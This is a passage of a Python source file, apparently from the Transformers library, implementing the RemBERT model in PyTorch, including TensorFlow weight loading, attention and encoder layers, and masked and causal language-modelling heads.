continue
logger.info(f"Loading TF weight {name} with shape {shape}")
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array)
for name, array in zip(names, arrays):
# Replace prefix with right one
name = name.replace("bert/", "rembert/")
# The pooler is a linear layer
# name = name.replace("pooler/dense", "pooler")
name = name.split("/")
# adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v
# which are not required for using pretrained model
if any(
n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
for n in name
):
logger.info(f"Skipping {'/'.join(name)}")
continue
pointer = model
for m_name in name:
if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
scope_names = re.split(r"_(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "kernel" or scope_names[0] == "gamma":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "output_weights":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "squad":
pointer = getattr(pointer, "classifier")
else:
try:
pointer = getattr(pointer, scope_names[0])
except AttributeError:
logger.info("Skipping {}".format("/".join(name)))
continue
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if m_name[-11:] == "_embeddings":
pointer = getattr(pointer, "weight")
elif m_name == "kernel":
array = np.transpose(array)
try:
assert (
pointer.shape == array.shape
), f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched"
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info(f"Initialize PyTorch weight {name}")
pointer.data = torch.from_numpy(array)
return model
class RemBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(
config.vocab_size, config.input_embedding_size, padding_idx=config.pad_token_id
)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.input_embedding_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.input_embedding_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = nn.LayerNorm(config.input_embedding_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
def forward(
self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0
):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + token_type_embeddings
position_embeddings = self.position_embeddings(position_ids)
embeddings += position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
# Copied from transformers.models.bert.modeling_bert.BertPooler with Bert->RemBert
class RemBertPooler(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
class RemBertSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
f"heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size)
self.key = nn.Linear(config.hidden_size, self.all_head_size)
self.value = nn.Linear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
self.is_decoder = config.is_decoder
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_value=None,
output_attentions=False,
):
mixed_query_layer = self.query(hidden_states)
# If this is instantiated as a cross-attention module, the keys
# and values come from an encoder; the attention mask needs to be
# such that the encoder's padding tokens are not attended to.
is_cross_attention = encoder_hidden_states is not None
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_layer = past_key_value[0]
value_layer = past_key_value[1]
attention_mask = encoder_attention_mask
elif is_cross_attention:
key_layer = self.transpose_for_scores(self.key(encoder_hidden_states))
value_layer = self.transpose_for_scores(self.value(encoder_hidden_states))
attention_mask = encoder_attention_mask
elif past_key_value is not None:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
key_layer = torch.cat([past_key_value[0], key_layer], dim=2)
value_layer = torch.cat([past_key_value[1], value_layer], dim=2)
else:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
if self.is_decoder:
# if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_layer, value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in RemBertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
if self.is_decoder:
outputs = outputs + (past_key_value,)
return outputs
# Copied from transformers.models.bert.modeling_bert.BertSelfOutput with Bert->RemBert
class RemBertSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertAttention with Bert->RemBert
class RemBertAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.self = RemBertSelfAttention(config)
self.output = RemBertSelfOutput(config)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_value=None,
output_attentions=False,
):
self_outputs = self.self(
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
past_key_value,
output_attentions,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.bert.modeling_bert.BertIntermediate with Bert->RemBert
class RemBertIntermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertOutput with Bert->RemBert
class RemBertOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertLayer with Bert->RemBert
class RemBertLayer(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = RemBertAttention(config)
self.is_decoder = config.is_decoder
self.add_cross_attention = config.add_cross_attention
if self.add_cross_attention:
assert self.is_decoder, f"{self} should be used as a decoder model if cross attention is added"
self.crossattention = RemBertAttention(config)
self.intermediate = RemBertIntermediate(config)
self.output = RemBertOutput(config)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_value=None,
output_attentions=False,
):
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
past_key_value=self_attn_past_key_value,
)
attention_output = self_attention_outputs[0]
# if decoder, the last output is tuple of self-attn cache
if self.is_decoder:
outputs = self_attention_outputs[1:-1]
present_key_value = self_attention_outputs[-1]
else:
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
cross_attn_present_key_value = None
if self.is_decoder and encoder_hidden_states is not None:
assert hasattr(
self, "crossattention"
), f"If `encoder_hidden_states` are passed, {self} has to be instantiated with cross-attention layers by setting `config.add_cross_attention=True`"
# cross_attn cached key/values tuple is at positions 3,4 of past_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
cross_attn_past_key_value,
output_attentions,
)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:-1] # add cross attentions if we output attention weights
# add cross-attn cache to positions 3,4 of present_key_value tuple
cross_attn_present_key_value = cross_attention_outputs[-1]
present_key_value = present_key_value + cross_attn_present_key_value
layer_output = apply_chunking_to_forward(
self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
)
outputs = (layer_output,) + outputs
# if decoder, return the attn key/values as the last output
if self.is_decoder:
outputs = outputs + (present_key_value,)
return outputs
def feed_forward_chunk(self, attention_output):
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class RemBertEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.embedding_hidden_mapping_in = nn.Linear(config.input_embedding_size, config.hidden_size)
self.layer = nn.ModuleList([RemBertLayer(config) for _ in range(config.num_hidden_layers)])
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=False,
output_hidden_states=False,
return_dict=True,
):
hidden_states = self.embedding_hidden_mapping_in(hidden_states)
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
next_decoder_cache = () if use_cache else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
past_key_value = past_key_values[i] if past_key_values is not None else None
if getattr(self.config, "gradient_checkpointing", False) and self.training:
if use_cache:
logger.warn(
"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting "
"`use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, past_key_value, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
)
else:
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
past_key_value,
output_attentions,
)
hidden_states = layer_outputs[0]
if use_cache:
next_decoder_cache += (layer_outputs[-1],)
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (layer_outputs[2],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [
hidden_states,
next_decoder_cache,
all_hidden_states,
all_self_attentions,
all_cross_attentions,
]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=next_decoder_cache,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
# Copied from transformers.models.bert.modeling_bert.BertPredictionHeadTransform with Bert->RemBert
class RemBertPredictionHeadTransform(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class RemBertLMPredictionHead(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.output_embedding_size)
self.decoder = nn.Linear(config.output_embedding_size, config.vocab_size)
self.activation = ACT2FN[config.hidden_act]
self.LayerNorm = nn.LayerNorm(config.output_embedding_size, eps=config.layer_norm_eps)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.activation(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
hidden_states = self.decoder(hidden_states)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertOnlyMLMHead with Bert->RemBert
class RemBertOnlyMLMHead(nn.Module):
def __init__(self, config):
super().__init__()
self.predictions = RemBertLMPredictionHead(config)
def forward(self, sequence_output):
prediction_scores = self.predictions(sequence_output)
return prediction_scores
class RemBertPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = RemBertConfig
load_tf_weights = load_tf_weights_in_rembert
base_model_prefix = "rembert"
_keys_to_ignore_on_load_missing = [r"position_ids"]
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, nn.Linear):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
REMBERT_START_DOCSTRING = r"""
This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`_ sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config (:class:`~transformers.RemBertConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model
weights.
"""
REMBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`transformers.RemBertTokenizer`. See
:func:`transformers.PreTrainedTokenizer.encode` and :func:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`({0})`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0,
1]``:
- 0 corresponds to a `sentence A` token,
- 1 corresponds to a `sentence B` token.
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`):
Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`({0}, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
@add_start_docstrings(
"The bare RemBERT Model transformer outputting raw hidden-states without any specific head on top.",
REMBERT_START_DOCSTRING,
)
class RemBertModel(RemBertPreTrainedModel):
"""
The model can behave as an encoder (with only self-attention) as well as a decoder, in which case a layer of
cross-attention is added between the self-attention layers, following the architecture described in `Attention is
all you need <https://arxiv.org/abs/1706.03762>`__ by Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit,
Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
To behave as an decoder the model needs to be initialized with the :obj:`is_decoder` argument of the configuration
set to :obj:`True`. To be used in a Seq2Seq model, the model needs to initialized with both :obj:`is_decoder`
argument and :obj:`add_cross_attention` set to :obj:`True`; an :obj:`encoder_hidden_states` is then expected as an
input to the forward pass.
"""
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = RemBertEmbeddings(config)
self.encoder = RemBertEncoder(config)
self.pooler = RemBertPooler(config) if add_pooling_layer else None
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=BaseModelOutputWithPastAndCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))` of length :obj:`config.n_layers` with each tuple having 4 tensors of shape :obj:`(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if self.config.is_decoder:
use_cache = use_cache if use_cache is not None else self.config.use_cache
else:
use_cache = False
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
batch_size, seq_length = input_shape
device = input_ids.device if input_ids is not None else inputs_embeds.device
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if attention_mask is None:
attention_mask = torch.ones(((batch_size, seq_length + past_key_values_length)), device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
past_key_values_length=past_key_values_length,
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
past_key_values=encoder_outputs.past_key_values,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
cross_attentions=encoder_outputs.cross_attentions,
)
@add_start_docstrings("""RemBERT Model with a `language modeling` head on top. """, REMBERT_START_DOCSTRING)
class RemBertForMaskedLM(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
if config.is_decoder:
logger.warning(
"If you want to use `RemBertForMaskedLM` make sure `config.is_decoder=False` for "
"bi-directional self-attention."
)
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.cls = RemBertOnlyMLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=MaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ...,
config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss() # -100 index = padding token
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return MaskedLMOutput(
loss=masked_lm_loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
effective_batch_size = input_shape[0]
# add a dummy token
assert self.config.pad_token_id is not None, "The PAD token should be defined for generation"
attention_mask = torch.cat([attention_mask, attention_mask.new_zeros((attention_mask.shape[0], 1))], dim=-1)
dummy_token = torch.full(
(effective_batch_size, 1), self.config.pad_token_id, dtype=torch.long, device=input_ids.device
)
input_ids = torch.cat([input_ids, dummy_token], dim=1)
return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings(
"""RemBERT Model with a `language modeling` head on top for CLM fine-tuning. """, REMBERT_START_DOCSTRING
)
class RemBertForCausalLM(RemBertPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder.bias"]
def __init__(self, config):
super().__init__(config)
if not config.is_decoder:
logger.warning("If you want to use `RemBertForCausalLM` as a standalone, add `is_decoder=True.`")
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.cls = RemBertOnlyMLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))` of length :obj:`config.n_layers` with each tuple having 4 tensors of shape :obj:`(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
